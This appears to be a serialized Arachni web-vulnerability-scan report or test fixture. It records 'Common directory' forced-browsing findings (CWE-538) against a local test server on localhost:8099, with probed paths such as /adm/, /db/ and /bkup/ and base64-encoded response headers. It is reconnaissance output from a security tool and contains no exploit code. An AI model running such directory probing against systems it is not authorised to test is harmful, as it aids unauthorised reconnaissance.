!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/new/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/new/
injected: new
id: new
elem: path
remarks: {}
method: ''
response: new
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/adm/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/adm/
injected: adm
id: adm
elem: path
remarks: {}
method: ''
response: adm
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/oracle/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/oracle/
injected: oracle
id: oracle
elem: path
remarks: {}
method: ''
response: oracle
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/odbc/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/odbc/
injected: odbc
id: odbc
elem: path
remarks: {}
method: ''
response: odbc
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/mall_log_files/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/mall_log_files/
injected: mall_log_files
id: mall_log_files
elem: path
remarks: {}
method: ''
response: mall_log_files
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTQ=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/WebTrend/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/WebTrend/
injected: WebTrend
id: WebTrend
elem: path
remarks: {}
method: ''
response: WebTrend
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/order/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/order/
injected: order
id: order
elem: path
remarks: {}
method: ''
response: order
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/support/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/support/
injected: support
id: support
elem: path
remarks: {}
method: ''
response: support
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/mp3/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/mp3/
injected: mp3
id: mp3
elem: path
remarks: {}
method: ''
response: mp3
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/db/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/db/
injected: db
id: db
elem: path
remarks: {}
method: ''
response: db
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mg==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/msql/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/msql/
injected: msql
id: msql
elem: path
remarks: {}
method: ''
response: msql
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/user/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/user/
injected: user
id: user
elem: path
remarks: {}
method: ''
response: user
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/demos/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/demos/
injected: demos
id: demos
elem: path
remarks: {}
method: ''
response: demos
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/bkup/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/bkup/
injected: bkup
id: bkup
elem: path
remarks: {}
method: ''
response: bkup
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/orders/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/orders/
injected: orders
id: orders
elem: path
remarks: {}
method: ''
response: orders
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
